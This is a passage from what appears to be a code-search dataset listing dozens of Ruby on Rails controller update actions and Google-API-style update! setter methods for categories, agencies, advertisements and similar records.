"def create\n HTTParty.post(create_url, :options => { :headers => HEADERS })\n end",
"def create_hotel(name:, address:)\n Hotel.create(\n name: name,\n address: address\n )\nend",
"def create\n @ag_apartment = Ag::Apartment.new(ag_apartment_params)\n\n respond_to do |format|\n if @ag_apartment.save\n format.html { redirect_to @ag_apartment, notice: 'Apartment was successfully created.' }\n format.json { render :show, status: :created, location: @ag_apartment }\n else\n format.html { render :new }\n format.json { render json: @ag_apartment.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @aadt = Aadt.new(params[:aadt])\n\n respond_to do |format|\n if @aadt.save\n format.html { redirect_to @aadt, notice: 'Aadt was successfully created.' }\n format.json { render json: @aadt, status: :created, location: @aadt }\n else\n format.html { render action: \"new\" }\n format.json { render json: @aadt.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @encyclopaedia = Encyclopaedia.new(params[:encyclopaedia])\n\n respond_to do |format|\n if @encyclopaedia.save\n flash[:notice] = 'Encyclopaedia was successfully created.'\n format.html { redirect_to(@encyclopaedia) }\n format.xml { render :xml => @encyclopaedia, :status => :created, :location => @encyclopaedia }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @encyclopaedia.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @hotel = Hotel.new(hotel_params)\n\n respond_to do |format|\n if @hotel.save\n format.html { redirect_to @hotel, notice: 'Hotel was successfully created.' }\n format.json { render :show, status: :created, location: @hotel }\n else\n format.html { render :new }\n format.json { render json: @hotel.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @hotel = Hotel.new(hotel_params)\n\n respond_to do |format|\n if @hotel.save\n format.html { redirect_to @hotel, notice: 'Hotel was successfully created.' }\n format.json { render :show, status: :created, location: @hotel }\n else\n format.html { render :new }\n format.json { render json: @hotel.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n # Get the variables passed in from params on create\n @expense = Expense.new(expense_params)\n\n if @expense.save\n render json: @expense, status: :created, location: @expense\n else\n render json: @expense.errors, status: :unprocessable_entity\n end\n end",
"def create\n @advertise = Advertise.new(advertise_params)\n\n respond_to do |format|\n if @advertise.save\n format.html { redirect_to @advertise, notice: 'Advertise was successfully created.' }\n format.json { render :show, status: :created, location: @advertise }\n else\n format.html { render :new }\n format.json { render json: @advertise.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @ag_country = Ag::Country.new(ag_country_params)\n\n respond_to do |format|\n if @ag_country.save\n format.html { redirect_to @ag_country, notice: 'Country was successfully created.' }\n format.json { render :show, status: :created, location: @ag_country }\n else\n format.html { render :new }\n format.json { render json: @ag_country.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @advertise = Advertise.new(advertise_params)\n\n respond_to do |format|\n if @advertise.save\n format.html { redirect_to @advertise, notice: \"Advertise was successfully created.\" }\n format.json { render :show, status: :created, location: @advertise }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @advertise.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n # @advertisement = Advertisement.new(params[:advertisement])\n respond_to do |format|\n if @advertisement.save\n format.html { redirect_to @advertisement, notice: 'Advertisement was successfully created.' }\n format.json { render json: @advertisement, status: :created, location: @advertisement }\n else\n format.html { render action: \"new\", notice: 'Advertisement was NOT successfully created.' }\n format.json { render json: @advertisement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n \n \n\t@attending = current_user.attendings.build(params[:attending])\n\n respond_to do |format|\n if @attending.save\n\t \n format.html { redirect_to @attending, notice: 'Your RSVP was successfully created.' }\n format.json { render json: @attending, status: :created, location: @attending }\n else\n format.html { render action: \"new\" }\n format.json { render json: @attending.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @opportunity = Opportunity.new(params[:opportunity])\n\n respond_to do |format|\n if @opportunity.save\n format.html { redirect_to @opportunity, notice: 'Opportunity was successfully created.' }\n format.json { render json: @opportunity, status: :created, location: @opportunity }\n else\n @supplier_accounts = SupplierAccount.approved.order 'fantasy_name'\n \n format.html { render action: \"new\" }\n format.json { render json: @opportunity.errors, status: :unprocessable_entity }\n end\n end\n end"
] | [
"0.7524271",
"0.74258316",
"0.7219422",
"0.69869757",
"0.6933055",
"0.6844494",
"0.6835852",
"0.66698694",
"0.6668519",
"0.6613647",
"0.660936",
"0.6579963",
"0.6416047",
"0.64136416",
"0.63984895",
"0.63452095",
"0.6283765",
"0.62245864",
"0.6209959",
"0.61748606",
"0.6084868",
"0.60846895",
"0.60715353",
"0.60625076",
"0.60493433",
"0.60113597",
"0.5998622",
"0.59904253",
"0.59629",
"0.5959274",
"0.5909114",
"0.5900243",
"0.58987",
"0.58802736",
"0.58762616",
"0.58743495",
"0.58467275",
"0.58408874",
"0.5834124",
"0.5833057",
"0.58224165",
"0.58002377",
"0.57955647",
"0.57941765",
"0.57848024",
"0.5782109",
"0.577762",
"0.57759655",
"0.5762098",
"0.5749528",
"0.5740347",
"0.57396364",
"0.5724769",
"0.5720691",
"0.57150024",
"0.5712457",
"0.5710516",
"0.5696447",
"0.5693543",
"0.5685018",
"0.5682827",
"0.5677778",
"0.5676176",
"0.56721354",
"0.56699204",
"0.56654114",
"0.56616396",
"0.56578916",
"0.5656042",
"0.56532425",
"0.5646464",
"0.56446236",
"0.56383824",
"0.56367975",
"0.5627084",
"0.56265265",
"0.5624415",
"0.5623103",
"0.56213605",
"0.5597242",
"0.55913806",
"0.5589478",
"0.558814",
"0.558654",
"0.55824566",
"0.5581161",
"0.55778426",
"0.55721825",
"0.5570558",
"0.55645484",
"0.55643",
"0.5559529",
"0.5559529",
"0.55496204",
"0.5545852",
"0.5544896",
"0.5544023",
"0.5540396",
"0.55372334",
"0.55365974"
] | 0.7636001 | 0 |
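Note: nearly all of the negatives in the record above follow the same Rails scaffold pattern for a create action. For reference, a minimal idiomatic sketch of that shared pattern; Widget and widget_params are placeholder names, not taken from any record in this dump:

def create
  @widget = Widget.new(widget_params)
  respond_to do |format|
    if @widget.save
      format.html { redirect_to @widget, notice: 'Widget was successfully created.' }
      format.json { render :show, status: :created, location: @widget }
    else
      format.html { render :new, status: :unprocessable_entity }
      format.json { render json: @widget.errors, status: :unprocessable_entity }
    end
  end
end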
PUT/PATCH agencyfeed.json: updates an agency feed's configuration (its agency and category) | def update
@agencyfeed.update! agencyfeed_params
render :show, status: :ok
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def update\n json_update(category,category_params, Category)\n end",
"def UpdateCategory params = {}\n \n APICall(path: 'categories.json',method: 'PUT',payload: params.to_json)\n \n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @confidence = args[:confidence] if args.key?(:confidence)\n end",
"def update\n Category.update(params[:category].keys, params[:category].values)\n\n redirect_to admin_ads_path\n end",
"def update!(**args)\n @category_id = args[:category_id] if args.key?(:category_id)\n @confidence = args[:confidence] if args.key?(:confidence)\n end",
"def update\n respond_to do |format|\n if @agendacategory.update(agendacategory_params)\n format.html { redirect_to @agendacategory, notice: 'Agendacategory was successfully updated.' }\n format.json { render :show, status: :ok, location: @agendacategory }\n else\n format.html { render :edit }\n format.json { render json: @agendacategory.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update_category_attribute_definition(kapp_slug, name, body, headers=default_headers)\n @logger.info(\"Updating the \\\"#{name}\\\" Category attribute definition in the \\\"#{kapp_slug}\\\" kapp.\")\n put(\"#{@api_url}/kapps/#{kapp_slug}/categoryAttributeDefinitions/#{encode(name)}\",body, headers)\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @tag = args[:tag] if args.key?(:tag)\n end",
"def update!(**args)\n @categories = args[:categories] if args.key?(:categories)\n end",
"def update!(**args)\n @categories = args[:categories] if args.key?(:categories)\n end",
"def update\n @agency = Agency.find(params[:id])\n\n if @agency.update(agency_params)\n #head :no_content\n render json: @agency, status: :accepted, location: @agency #sera? status accepted? \n else\n render json: @agency.errors, status: :unprocessable_entity\n end\n end",
"def update!(**args)\n @additional_categories = args[:additional_categories] if args.key?(:additional_categories)\n @primary_category = args[:primary_category] if args.key?(:primary_category)\n end",
"def update\n respond_to do |format|\n if @alien_category.update(alien_category_params)\n format.html { redirect_to @alien_category, notice: 'Alien category was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @alien_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @agency_associations = args[:agency_associations] if args.key?(:agency_associations)\n end",
"def update!(**args)\n @app_store_link = args[:app_store_link] if args.key?(:app_store_link)\n @category_id = args[:category_id] if args.key?(:category_id)\n @category_name = args[:category_name] if args.key?(:category_name)\n @chart_type = args[:chart_type] if args.key?(:chart_type)\n @rank = args[:rank] if args.key?(:rank)\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @domain = args[:domain] if args.key?(:domain)\n @features = args[:features] if args.key?(:features)\n @score = args[:score] if args.key?(:score)\n end",
"def update\n respond_to do |format|\n if @advert_category.update(advert_category_params)\n format.html { redirect_to @advert_category, notice: 'Advert category was successfully updated.' }\n format.json { render :show, status: :ok, location: @advert_category }\n else\n format.html { render :edit }\n format.json { render json: @advert_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @accolade_category.update(accolade_category_params)\n format.html { redirect_to edit_admin_accolade_category_path(@accolade_category), notice: 'Accolade category was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @accolade_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @state = args[:state] if args.key?(:state)\n end",
"def update\n @feed_category = FeedCategory.find(params[:id])\n\n respond_to do |format|\n if @feed_category.update_attributes(params[:feed_category])\n format.html { redirect_to @feed_category, :notice => 'Feed category was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @feed_category.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n if @category.update(category_params)\n render json: @category, status: :ok\n else\n render json: @category.errors, status: :unprocessable_entity\n end\n end",
"def update\n @agency = Agency.find(params[:id])\n\n if @agency.update(agency_params)\n #head :no_content\n render json: @agency, status: :accepted, location: @agency #sera? status accepted? \n else\n render json: @agency.errors, status: :unprocessable_entity\n end\n end",
"def update\n @category.update(category_params)\n end",
"def update!(**args)\n @ad_formats = args[:ad_formats] if args.key?(:ad_formats)\n @territories = args[:territories] if args.key?(:territories)\n end",
"def update\n respond_to do |format|\n if @badge_category.update(badge_category_params)\n format.html { redirect_to @badge_category, notice: 'Badge category was successfully updated.' }\n format.json { render :show, status: :ok, location: @badge_category }\n else\n format.html { render :edit }\n format.json { render json: @badge_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @incidentcategory.update(incidentcategory_params)\n json_response(@incidentcategory)\n else\n render json: @incidentcategory.errors, status: :unprocessable_entity\n end\n end\n end",
"def update_factcat\n cat = Category.find(self.category_id)\n self.factcat_id = cat.get_factcat_from_category.id\n self.save!\n end",
"def update\n\t @expense = Expense.find(params[:id])\n\t @expense.categories = params[:categories].split(',')\n\n respond_to do |format|\n if @expense.update_attributes(params[:expense])\n add_tagger_to_taggings(@expense)\n format.html { redirect_to @expense, notice: 'Expense was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @expense.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @adcategory.update(adcategory_params)\n format.html { redirect_to @adcategory, notice: 'Adcategory was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @adcategory.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @confidence = args[:confidence] if args.key?(:confidence)\n @is_restricted = args[:is_restricted] if args.key?(:is_restricted)\n @mid = args[:mid] if args.key?(:mid)\n end",
"def update!(**args)\n @category_name = args[:category_name] if args.key?(:category_name)\n end",
"def update\n respond_to do |format|\n\n intent_request = @api_ai_client.create_intents_request\n response = intent_request.update(@category.intent_id, param_options)\n\n if response.is_a?(Hash) && response[:status][:code].eql?(200)\n\n contexts_templates = { contexts: category_params[:contexts].split(\",\"), templates: category_params[:templates].split(\",\") }\n\n if @category.update(category_params.merge(contexts_templates))\n format.html { redirect_to @category, notice: 'Category was successfully updated.' }\n format.json { render :show, status: :ok, location: @category }\n else\n format.html { render :edit }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n else\n @notice = response.message\n\n format.html { render :new }\n format.json { render json: { error: response.message }, status: response.code}\n end\n end\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @classifier_version = args[:classifier_version] if args.key?(:classifier_version)\n @taxonomy = args[:taxonomy] if args.key?(:taxonomy)\n @taxonomy_name = args[:taxonomy_name] if args.key?(:taxonomy_name)\n end",
"def update\n respond_to do |format|\n if @category.update(category_params)\n format.json { render :show, status: :ok, location: @category }\n else\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @brand_category.update(brand_category_params)\n head :no_content\n else\n render json: @brand_category.errors, status: :unprocessable_entity\n end\n end",
"def update\n respond_to do |format|\n if @category.update(category_params)\n format.html { redirect_to api_v1_category_path(@category), notice: 'Category was successfully updated.' }\n format.json { render :show, status: :ok, location: @category }\n else\n format.html { render :edit }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @accessory_category = AccessoryCategory.find(params[:id])\n\n if @accessory_category.update(accessory_category_params)\n audit(@accessory_category, current_user)\n head :no_content\n else\n render json: @accessory_category.errors, status: :unprocessable_entity\n end\n end",
"def update\n if @agency.update(agency_params)\n @agency = Agency.new\n @agencies = Agency.all\n @flag = true\n else\n @flag = false\n end\n end",
"def update\n @category.update_attributes(params[:category])\n respond_with(@category)\n end",
"def update!(**args)\n @category_group = args[:category_group] if args.key?(:category_group)\n @state = args[:state] if args.key?(:state)\n end",
"def update\n @consumer_category = ConsumerCategory.find(params[:id])\n\n respond_to do |format|\n if @consumer_category.update_attributes(params[:consumer_category])\n format.html { redirect_to @consumer_category, notice: 'Consumer category was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @consumer_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n category= Category.find(params[:id])\n category.update(category_params)\n \n end",
"def update\n respond_to do |format|\n if @gt_category.update(gt_category_params)\n format.html { redirect_to @gt_category, notice: 'Gt category was successfully updated.' }\n format.json { render :show, status: :ok, location: @gt_category }\n else\n format.html { render :edit }\n format.json { render json: @gt_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @company = Company.find(params[:id])\n params[:company][:category_ids] ||= []\n respond_to do |format|\n if @company.update_attributes(params[:company])\n format.html { redirect_to(@company, :notice => 'Company was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @company.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @auto_tagging_enabled = args[:auto_tagging_enabled] if args.key?(:auto_tagging_enabled)\n @customer_id = args[:customer_id] if args.key?(:customer_id)\n @kind = args[:kind] if args.key?(:kind)\n end",
"def update\n @abuse_category = AbuseCategory.find(params[:id])\n\n respond_to do |format|\n if @abuse_category.update_attributes(params[:abuse_category])\n format.html { redirect_to @abuse_category, notice: 'Abuse category was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @abuse_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update_categories(categories, options = {} )\n options.merge!(:docid => self.docid, :categories => categories)\n resp = @conn.put do |req|\n req.url \"categories\"\n req.body = options.to_json\n end\n\n resp.status \n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @label = args[:label] if args.key?(:label)\n end",
"def update\n @expense = @household.expenses.find(params[:id])\n respond_to do |format|\n if @expense.update(expense_params)\n\n # c = Category.find cat_params[:category].to_i\n #\n # if @expense.categories << c\n # puts 'SUPER'\n # else\n # puts 'SCHEIßE'\n # end\n\n flash[:alert] = 'Expense was successfully updated.'\n format.html {redirect_to household_expenses_path(@household)}\n format.json {render :show, status: :ok, location: @expense}\n else\n format.html {render :edit}\n format.json {render json: @expense.errors, status: :unprocessable_entity}\n end\n end\n end",
"def update!(**args)\n @categories = args[:categories] if args.key?(:categories)\n @next_page_token = args[:next_page_token] if args.key?(:next_page_token)\n @total_category_count = args[:total_category_count] if args.key?(:total_category_count)\n end",
"def update!(**args)\n @categories = args[:categories] if args.key?(:categories)\n @next_page_token = args[:next_page_token] if args.key?(:next_page_token)\n @total_category_count = args[:total_category_count] if args.key?(:total_category_count)\n end",
"def update\n if @category.update(params[:category])\n head :no_content\n else\n render json: @category.errors, status: :unprocessable_entity\n end\n end",
"def update\n @headline = t(:update_category)\n @category = Category.find(params[:id])\n\n respond_to do |format|\n if @category.update_attributes(params[:category])\n format.html { redirect_to @category, notice: t(:updated_category_success) }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\r\n @category = Category.find(params[:id])\r\n \r\n respond_to do |format|\r\n if @category.update_attributes(params[:category])\r\n flash[:notice] = 'Category was successfully updated.'\r\n format.html { redirect_to(admin_category_path) }\r\n format.xml { head :ok }\r\n else\r\n @businesses = Business.find(:all, :order => :name)\r\n format.html { render :action => \"edit\" }\r\n format.xml { render :xml => @category.errors, :status => :unprocessable_entity }\r\n end\r\n end\r\n end",
"def update!(**args)\n @job_categories = args[:job_categories] if args.key?(:job_categories)\n @locations = args[:locations] if args.key?(:locations)\n end",
"def update\n respond_to do |format|\n if @business_event_category.update(business_event_category_params)\n format.html { redirect_to @business_event_category, notice: 'Business event category was successfully updated.' }\n format.json { render :show, status: :ok, location: @business_event_category }\n else\n format.html { render :edit }\n format.json { render json: @business_event_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @category.update(category_params)\n format.html { redirect_to admin_good_categories_url, notice: 'GoodCategory was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @coach_category.update(coach_category_params)\n format.html { redirect_to @coach_category, notice: 'Categoria de treinador foi actualizada com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @coach_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @description = args[:description] if args.key?(:description)\n @details = args[:details] if args.key?(:details)\n @reason = args[:reason] if args.key?(:reason)\n @state = args[:state] if args.key?(:state)\n end",
"def update\n @advocacy = Advocacy.find(params[:id])\n\n respond_to do |format|\n if @advocacy.update_attributes(params[:advocacy])\n format.html { redirect_to @advocacy, notice: 'Advocacy was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @advocacy.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @category = Category.find(params[:id])\n\n respond_to do |format|\n if @category.update_attributes(params[:category])\n format.html { redirect_to api_v1_categories_path, notice: 'Category was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @category.update(category_params)\n format.html { redirect_to backend_shop_branch_category_path(@current_shop.slug, @current_branch, @category), notice: t('Category was successfully updated.') }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @organization_catagory.update(organization_catagory_params)\n format.html { redirect_to @organization_catagory, notice: 'Organization catagory was successfully updated.' }\n format.json { render :show, status: :ok, location: @organization_catagory }\n else\n format.html { render :edit }\n format.json { render json: @organization_catagory.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @category.assign_attributes(category_params)\n respond_to do |format|\n if @category.save\n format.html { redirect_to edit_category_url(@category), notice: 'Category was successfully updated.' }\n format.json { render :show, status: :ok, location: @category }\n else\n format.html { render :edit }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @category_group_state = args[:category_group_state] if args.key?(:category_group_state)\n @category_state = args[:category_state] if args.key?(:category_state)\n end",
"def update\n respond_to do |format|\n if @schema_category.update(schema_category_params)\n format.html { redirect_to schema_categories_path, notice: 'Schema category was successfully updated.' }\n format.json { render :show, status: :ok, location: @schema_category }\n else\n format.html { render :edit }\n format.json { render json: @schema_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n # update attribute\n if @category.update_attributes(category_params)\n # flash message\n flash.now[:success] = \"更新完了しました。\"\n # get category data\n all_categories\n else\n render 'edit'\n end\n end",
"def update\n respond_to do |format|\n if @category.update_attributes(params[:category])\n if @category.cambio_algo\n format.html {redirect_to notify_changes_category_url}\n else\n format.html { redirect_to(@category, :notice => t('scaffold.notice.updated', :item=> Category.model_name.human)) }\n format.xml { head :ok }\n end\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @category.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @top_category.update(top_category_params)\n format.json { render :show, status: :ok, location: @top_category }\n else\n format.json { render json: @top_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n category = Documents::Category.find(params[:id])\n category.update!(category_params)\n redirect_to categories_path\n end",
"def set_agendacategory\n @agendacategory = Agendacategory.find(params[:id])\n end",
"def update\n @category = Category.find(params[:id])\n @category.update_attributes(params[:category])\n respond_with(@category, location: categories_url)\n end",
"def update\n respond_to do |format|\n if @accommodation_category.update(accommodation_category_params)\n format.html { redirect_to @accommodation_category, notice: 'Accommodation category was successfully updated.' }\n format.json { render :show, status: :ok, location: @accommodation_category }\n else\n format.html { render :edit }\n format.json { render json: @accommodation_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @agency_type = AgencyType.find(params[:id])\n\n respond_to do |format|\n if @agency_type.update_attributes(params[:agency_type])\n format.html { redirect_to @agency_type, notice: 'Agency type was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @agency_type.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @audit_feedback_category.update(audit_feedback_category_params)\n format.html { redirect_to audit_feedback_categories_path }\n format.json { render :show, status: :ok, location: @audit_feedback_category }\n else\n format.html { render :edit }\n format.json { render json: @audit_feedback_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @expense.categories_expenses.destroy_all\n if (params[:expense][:categories]) \n params[:expense][:categories].each do |category_id|\n category_id = category_id.to_i\n if category_id > 0\n @expense.categories << Category.find(category_id)\n end\n end\n end\n\n respond_to do |format|\n if @expense.update_attributes(params[:expense])\n flash[:notice] = 'Expense was successfully updated.'\n format.html { redirect_to(@expense) }\n format.xml { head :ok }\n format.iphone { redirect_to :controller => \"welcome\", :action => \"home\" }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @expense.errors, :status => :unprocessable_entity }\n format.iphone { render :action => \"edit\" }\n end\n end\n end",
"def update\n @recipe.allergies.destroy_all\n params[:recipe][:allergy].each do |key,value|\n if value[\"name\"] == \"1\"\n allergy = Allergy.find(key)\n @recipe.allergies << allergy\n end\n end\n\n if params[:recipe][:concentrate] == '1' || params[:recipe][:recipe_category_id] == RecipeCategory.find_by(name: \"Concentrates\").id\n @recipe.concentrate = true\n else\n @recipe.concentrate = false\n end\n\n respond_to do |format|\n if @recipe.update(recipe_params)\n @allergies = Allergy.all\n format.html { redirect_to @recipe, notice: 'Recipe was successfully updated.' }\n format.json { render :show, status: :ok, location: @recipe }\n else\n @allergies = Allergy.all\n format.html { render :edit }\n format.json { render json: @recipe.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @category_offer.update_attributes(params[:category_offer])\n format.html { redirect_to @category_offer, notice: 'Category offer was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @category_offer.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @patch_name = args[:patch_name] if args.key?(:patch_name)\n @severity = args[:severity] if args.key?(:severity)\n @summary = args[:summary] if args.key?(:summary)\n end",
"def update!(**args)\n @ad_breaks = args[:ad_breaks] if args.key?(:ad_breaks)\n @ads_on_embeds = args[:ads_on_embeds] if args.key?(:ads_on_embeds)\n @countries_restriction = args[:countries_restriction] if args.key?(:countries_restriction)\n @id = args[:id] if args.key?(:id)\n @kind = args[:kind] if args.key?(:kind)\n end",
"def update\n respond_to do |format|\n if @vendor_category.update(vendor_category_params)\n format.html { redirect_to @vendor_category, notice: 'Vendor category was successfully updated.' }\n format.json { render :show, status: :ok, location: @vendor_category }\n else\n format.html { render :edit }\n format.json { render json: @vendor_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @news_agency = NewsAgency.find(params[:id])\n\n respond_to do |format|\n if @news_agency.update_attributes(params[:news_agency])\n format.html { redirect_to @news_agency, notice: 'News agency was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @news_agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @aspect_cluster_ids = args[:aspect_cluster_ids] if args.key?(:aspect_cluster_ids)\n @brand_entity_id = args[:brand_entity_id] if args.key?(:brand_entity_id)\n @bx_category_ids = args[:bx_category_ids] if args.key?(:bx_category_ids)\n @measures = args[:measures] if args.key?(:measures)\n @merchant_ids = args[:merchant_ids] if args.key?(:merchant_ids)\n @merchant_source_ids = args[:merchant_source_ids] if args.key?(:merchant_source_ids)\n @tag_ids = args[:tag_ids] if args.key?(:tag_ids)\n end",
"def update\n respond_to do |format|\n if @suggested_category.update(suggested_category_params)\n format.html { redirect_to @suggested_category, notice: 'Suggested category was successfully updated.' }\n format.json { render :show, status: :ok, location: @suggested_category }\n else\n format.html { render :edit }\n format.json { render json: @suggested_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @price_list_item_id = args[:price_list_item_id] if args.key?(:price_list_item_id)\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @price_list_item_id = args[:price_list_item_id] if args.key?(:price_list_item_id)\n end",
"def update!(**args)\n @category_id = args[:category_id] if args.key?(:category_id)\n @cluster_ids = args[:cluster_ids] if args.key?(:cluster_ids)\n @detection_score = args[:detection_score] if args.key?(:detection_score)\n @embedding = args[:embedding] if args.key?(:embedding)\n @entities = args[:entities] if args.key?(:entities)\n @feature_type = args[:feature_type] if args.key?(:feature_type)\n @product_location = args[:product_location] if args.key?(:product_location)\n @token_groups = args[:token_groups] if args.key?(:token_groups)\n end",
"def update\n updated_activity = params.require(:activity).permit(:title, :body,\n tags_attributes:\n [:category_id])\n activity = Activity.find(params[:id])\n # first, clear any of the current activity's categories, then save\n Tag.where(activity_id: activity.id).destroy_all\n activity.update_attributes(updated_activity)\n\n respond_to do |format|\n format.html { redirect_to activity }\n format.json { render json: @activity }\n end\n end",
"def update!(**args)\n @app_id = args[:app_id] if args.key?(:app_id)\n @attribution_model_settings = args[:attribution_model_settings] if args.key?(:attribution_model_settings)\n @category = args[:category] if args.key?(:category)\n @click_through_lookback_window_days = args[:click_through_lookback_window_days] if args.key?(:click_through_lookback_window_days)\n @creation_time = args[:creation_time] if args.key?(:creation_time)\n @floodlight_settings = args[:floodlight_settings] if args.key?(:floodlight_settings)\n @id = args[:id] if args.key?(:id)\n @include_in_client_account_conversions_metric = args[:include_in_client_account_conversions_metric] if args.key?(:include_in_client_account_conversions_metric)\n @include_in_conversions_metric = args[:include_in_conversions_metric] if args.key?(:include_in_conversions_metric)\n @name = args[:name] if args.key?(:name)\n @owner_customer = args[:owner_customer] if args.key?(:owner_customer)\n @primary_for_goal = args[:primary_for_goal] if args.key?(:primary_for_goal)\n @resource_name = args[:resource_name] if args.key?(:resource_name)\n @status = args[:status] if args.key?(:status)\n @type = args[:type] if args.key?(:type)\n @value_settings = args[:value_settings] if args.key?(:value_settings)\n end",
"def agendacategory_params\n params.require(:agendacategory).permit(:category)\n end",
"def update\n @admin_agency = Admin::Agency.find(params[:id])\n\n respond_to do |format|\n if @admin_agency.update_attributes(params[:admin_agency])\n format.html { redirect_to @admin_agency, notice: 'Agency was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @admin_agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @channel_category = ChannelCategory.find(params[:id])\n\n respond_to do |format|\n if @channel_category.update_attributes(params[:channel_category])\n format.html { redirect_to marketing_channel_category_path(@channel_category), notice: 'Channel category was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @channel_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @api_v1_group_category.update(api_v1_group_category_params)\n format.html { redirect_to @api_v1_group_category, notice: 'Group category was successfully updated.' }\n format.json { render :show, status: :ok, location: @api_v1_group_category }\n else\n format.html { render :edit }\n format.json { render json: @api_v1_group_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @aspcategory.update(aspcategory_params)\n format.html { redirect_to @aspcategory, notice: 'Aspcategory was successfully updated.' }\n format.json { render :show, status: :ok, location: @aspcategory }\n else\n format.html { render :edit }\n format.json { render json: @aspcategory.errors, status: :unprocessable_entity }\n end\n end\n end",
